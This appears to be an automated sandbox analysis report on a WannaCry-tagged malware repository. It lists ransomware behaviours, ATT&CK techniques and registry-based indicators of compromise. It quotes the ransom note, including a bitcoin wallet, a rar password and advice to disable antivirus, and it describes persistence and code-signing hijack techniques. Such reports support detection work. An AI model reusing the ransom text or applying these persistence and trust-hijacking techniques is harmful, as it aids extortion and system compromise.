wannacry | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Analysis

max time kernel
528s
max time network
740s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-10-2024 21:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

wannacry adware agilenet defense_evasion discovery evasion execution impact motw persistence phishing privilege_escalation ransomware spyware stealer trojan upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\WebCheck = "³…€€²À-\b<¦$F*\aÛõ<9õªYO¿æ/7³^"	cmd.exe

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Y`’-?õ0ÅE™x;7\x17w¦bÐùž\u00adIR®}\u00adc\u0081"	cmd.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Boot or Logon Autostart Execution: Active Setup 2 TTPs 64 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515}\Locale = "is\x1cæM\x02Ïñ\x7fE 3T¾´Ö§f\u008fnÚZµ\x14\x1fš´Ä"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}\Version = "f\"Æ&Ç¡\x0eX´™á¤icø®ðféë}>4\x01‡Â\x17â"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{A6EADE66-0000-0000-484E-7E8A45000000}\Version = "€óÖ•\x05<ÍJCI¥Æ~¬my9\x0e\tôaq[ª"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\LocalizedName = "\x7f7\\ÂËûèW“P¥\x18Dç¥¨Bÿ+yf\x05Ç¢èýjG"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{23A20C3C-2ADD-4A80-AFB4-C146F8847D79}\Locale = "\\\x02Ü-?¨U{\\4O\x04\f†¡\x06©-ãú¥\u009dä@~ÏW\a"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F}\Version = "F´2ÃÐ[\x1a.ú4Ó ð\x7fŸG}\x17\u008d8¨\x1c˜}5ao]"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{990CB269-A600-38D0-B7D1-FBD392495F13}\Version = "¨\x18\x14c…³hT\x15Š£Þ\x10Í‘ð£çé‘\x16Uä€øCËÉ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{25FFAAD0-F4A3-4164-95FF-4461E9F35D51}\Locale = "%Îþ¨\x04L{dºAŒ\x061W¸\x13²OX]±¢1\t\x11i\x18â"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089}\ = "_<ôö°#Êõ³…\u0081ta8µE\x03x\x7f¾'NÎ@\x137\"Ñ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5}\ = "Me½@ÈáŒç¼òæI\x1f\a&›w'õ\x1døòÓ[˜…Ì("	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{CE4BC71D-A88B-4943-BB3D-AF9C0E7D4387}\ComponentID = "4r°PÒ¥2J¿\x05·\x1dA56ûú\x13Þ\u0090÷l[Êâ‘\x03Þ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9}\Version = "SµÂ°Ôì-Ç`ßaþ*Ö)DfEŽ\x7fCYó=\r-ßV"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E}\ = "À\v]u\x18XÊcÍ‡:‹å\x1evì6WK¹Ýp®ñT\x04KÕ"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{25FFAAD0-F4A3-4164-95FF-4461E9F35D51}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{CE4BC71D-A88B-4943-BB3D-AF9C0E7D4387}\ = "2û—Œþ\fµh\r5Ð\x02€ù+r<¦ë£Þ\u009dº-y`'ô"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E}\ComponentID = "×\x02ßþón«r\u00ad’–<j¼dÖì\|`jþ™Œ1\x117ô<"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{A6EADE66-0000-0000-484E-7E8A45000000}\ = "9\tAB$f¬Ñ³‘\"‘¥9²D½”\x11=\x06ÏQ(þ\x15þl"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{CE4BC71D-A88B-4943-BB3D-AF9C0E7D4387}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{23A20C3C-2ADD-4A80-AFB4-C146F8847D79}\ = "ì_\x1eAlh©€ÖR*¦~\f—OY\x1bUb\x14^§–\n3jb"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}\ComponentID = "\x01ÀuÒì\x10\u0090·©Ôá‘ÝÒÝÃO\v\u008f[vì6*\r¦¿;"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}\ = "Æb—&‰;çx\x12‡_u2.ß\x1dÈêØò=\u008f‡\x1f.Uíd"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9}\Locale = "$B9vy.iß\x19,IÆ¿”…H–\r\u0081ø¹êÉðbõß\b"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{25FFAAD0-F4A3-4164-95FF-4461E9F35D51}\Version = "ì)¨ÄÉA×TE\u0090æ0æ\x10\x11Zð&Ð\x1cÛœ3ì‰6Œ\x0e"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}\ComponentID = "Q#\x17¨}ä?¡A\x13)\x01`%e8Æ\b\vÇ¨´1\x19nt\t2"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD}\ComponentID = "£\x1eÄ”\x19äF·ƒ›\x10U–¶ú¯{ÍQ<¨o"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515}\Locale = "þ4“ÃŽ\|œ\x02_\u008d\x04°˜Sâe•ÿ~Ì—¦°9P5\u00a0é"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}\Locale = "M•ñ‚_4\x16\x04]\u00a0.ný2È\t!\x16\x14y#Rÿ¼—‡"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}\KeyFileName = "3\x7f\v\f´;_ë¸\x1dƒ*&0\x03®\x13Á[?ËÖÚZÖ\x10€\x0f"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}\StubPath = "6ea"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}\Locale = "ÖRxÖµÎ¿\x12œt\x1cþ\"\u0090Õ¯ºáþ¶¸÷\u00ad\x06W]MÔ"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515}\ComponentID = "È…LºŸ\"‡ß’Ã}~\x1c\u008fÿÜGƒ“è¶ï7wÖk6Ú"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F}\ = "\a\x1dG\vAÊö^O¸l¬\x10@9œá¬nî±\x11UøŒ-+w"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}\ = "UwÿáÓ/ü-Ñó\u0081˜Tý™Bo\x1d˜ÐX8¹œAx‘Ò"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089}\Version = "\v*L¼vµÌ\x10™{\u009d{³NºT\x1e$â\x04ÿe3tÙí«g"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}\ = "\nåÐ&F\x18ßCr¶ì¹³#\x13\r3‚wÀãO«\x12¹;hÃ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\ = "1ßoü[eÍœ\fµ\x1b\f\x16<?9™_5=©ýØCg\"òí"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5A604D2C-E968-429B-8327-62B5CE52126D}\Version = "\"»\x1e´Jß\x14tåb±ƒ¶y™¬I•`\|g~\x15\bôá"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}\Locale = "è?ÿ¨«Z\x19èN"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}\LocalizedName = "§ãK¯î(qtk¶ÍÙ©…Ñ\nDž¨e\|ÏÀ\x02Ofk‰"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}\ = "·º\x1f\x1cxp1ÿîK&Ò»(\x10‹ÉïÒðü;¿!ü\x02\f—"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}\Version = "N¼\x12/ó9¢ßŸ©ùÙØ-öÐ\b\x13ÖÿXƒU§\x02b‰#"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD}\ = "q¾\|b\rY›Ç¬\rl‡ß0yˆÄ×;“w\t\x17gW£\x04³"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}\ComponentID = "U~Õ€x3qp\x06\x0ej¬FÃ8WX¤.yTØó×»Že›"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}\Version = "4™BÊ?\x14\x01w;\x14·ÈŸ¿y\u0090ð€ù\aÝÈõ;H@—Ì"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9}\ = "Rì{?Ó\x01T2'Ë3ðÍ\fè†\x04ZCÚøÃz\\yº¯Ô"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{A6EADE66-0000-0000-484E-7E8A45000000}\ComponentID = "Yµ2;gõ\x0eS\x16q\x14_ì!´Øy¿g7åÏ£óÝù’\t"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}\Locale = "\x1b@ Å\x1ccÁ¡-®–×ÒŒ\u00a0³¥ä¹“7\x16O\x04ÈÁ\"š"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD}\Version = "EŠÕo¿Ï\x04’\x0f\x0eÏ}©~y\x16ˆ¼Ž.Àpj\x1e\x05ˆ> "	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}\ = "\a˜UMjž\\ûAzè<55\nÀ€Ùg\u00a0A”‡š†KV¹"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}\Locale = "\x1aj*’\x15§‡ù²¼4\x01\x1f†ì•e&H:¾\u009d<9~jÒ!"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}\Version = "Â:'’üØÑkê‡\x16ÏÓ7…\vUtf¦›\x17XûB¸íì"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515}\Version = "[¶ÙÙÍ¢åç1`\x1e\x13M©\x16žl+Ö\u008dB j‡f\x14VH"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}\ComponentID = "ªù\u00a0Çwá\x17Š\u0090•X–`&h\x1d\r8åà?Nª*Îñf˜"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9}\ComponentID = "{‰ô¦ËÎÞÎCK¼1ý\"seóÇ”j™\x0e\x02\t?§·¤"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}	cmd.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RKill_V2.9.1.064.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RKill_V2.9.1.064.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RKill_V2.9.1.064.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Manipulates Digital Signatures 1 TTPs 64 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\Dll = "Wdtr\tü¨÷íe×¿\|x½¢/H´‹]Äu¾\x01ªªñ"	cmd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyRevocation\DEFAULT\Dll = 030078010400b7003f001800c3003800c6004000b700ca001c207100d00024006b006f001900e500a7000700ce0033005c0059006100c80000000000	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB}\$Function = "\u008fÇ\u0090ö%A¿×ƒ)XL¢ùr^ãß½\x06\x1d°ñqË°\x10ù"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{189A3842-3041-11D1-85E1-00C04FC295EE}\$Function = "DÖ„š§&W¿ŽÅàá€\x1d\x1fD\x1büÙ …wOçËN]í"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{31D1ADC1-D329-11D1-8ED8-0080C76516C6}\$DLL = "ßytY^‹Üh(ÈÝh@Ù™S™“\|š`“\fD©,P®"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function = "\x1c3\n¼ð\u0081\x05¿wó›¤è§þçãõ}`ã‚R{(Q"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{DE351A42-8E59-11D0-8C47-00C04FC295EE}\FuncName = "ÌHÌ8Û\u0090ry•*C¹æ äP¼\x1a nêÅ (Ý“´\x0e"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB}\Dll = "\v\x17]Y‘Ï\aS§‡\u00adšŠ\t¿öö°\x15\"\x16áCƒBãÁ?"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51}\FuncName = "\x18ÓmRû\u00adDÓ•ï°õ¡›ï¥\x06\x04e˜;O\x05³QÊ5G"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2007\FuncName = "óžR\x17šIMõà5U]gf/'\u008f\x1c9¬<_âãŸs\x03‘"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.4\FuncName = "Ü\x1f¹”iÒ!\x01û*\u008d°£x\x11ÛxˆW…\x1a\x0e\b€Cí\x1f‡"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$Function = "o\nÉ\x1dìŽþmr\x10¸ý3lk<YÔ‰Ö\tA…qÿl\x12È"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\FuncName = "ú\x05gâ<ÇOÍå¹˜ñ7É†Ž%làÅá>á\x16Ž\x11Ìì"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL = "Ç¾Ë (fŒ\n×óƒkŒx0i\x1f6\x0fÁsH>T,2zT"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "€¥S·îúÆ&x,ÍÛ(%\x19ÚÌ`f;øÅÒ\x16Ç\\cU"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51}\Dll = "æx^\x1e\x7f\|¡ÚËUŽ\u008fCé¿Ûž!‘´Å9¬Y\|+\x04{"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C}\Dll = "êMÞ´}µ\u008dÑH\x1eX³B\x03¥å^\n’KµB\\üÂ!\x0fë"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}\FuncName = "ÀmÑ–Añ,\\\x02!¿´Ü½”¬V\x12ã1Âqç½X\u0081û\|"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{1A610570-38CE-11D4-A2A3-00104BD35090}\Dll = "\x02þxç\x1fû_6\u0090fœ¸øŸŸ¼‘¸îÏ¥Œ;¶›ß.:"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.10\Dll = "+\x0eŸ:cO\x11»;hð}¼sŒ‰“ô\x1e¢\x01\x12¥›\x06çcã"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.11\FuncName = "7\u0090\x11•9ÅªN2”\x03\u00a0L?“\x12§ÉËï‘\u00ad,Ï\u008fÉ\u0090\x10"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2004\FuncName = "7w”á2µG³™ÃÐQ_\x1a\x1eƒè^\x1b8,‹îÆˆ¶ƒ¨"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.2\FuncName = "(\|VU\x1b\u0081éƒ”‰á…¢ÙªÌ\x108¯Çƒª³Û¦ÙË÷"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}\FuncName = "M·\x17ÏMVø+¬¹þmFá.«ûÿ1\x0f\u009dY¨*…P\n3"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\Dll = "wQÔ\x1a’¬éîß\x14„¾j)´79Áð\"›\x19ÿ\x03§<*\|"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20\Dll = "\tßÙÜØËœ$¶+»×®è*Åc\u0090¬;\x1dq\\LÁaN\x1b"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12\Dll = "ï§#/µß€©çˆ¬0àN\x18ß\x12K\u008f¹\u0081ã€›3\x16 Ë"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$Function = "S&ÿ¾\"é&\x19)\bŽœ‰\x7f]BÜB·š§¥÷\x06w´HÇ"	cmd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllLogMismatchPinRules\DEFAULT\Dll = fe0032001200c6024200c4001f00280068007b00900039202600fc0076007b0018205e005900c6007c003d002e003000d200b6006101f10000000000	cmd.exe
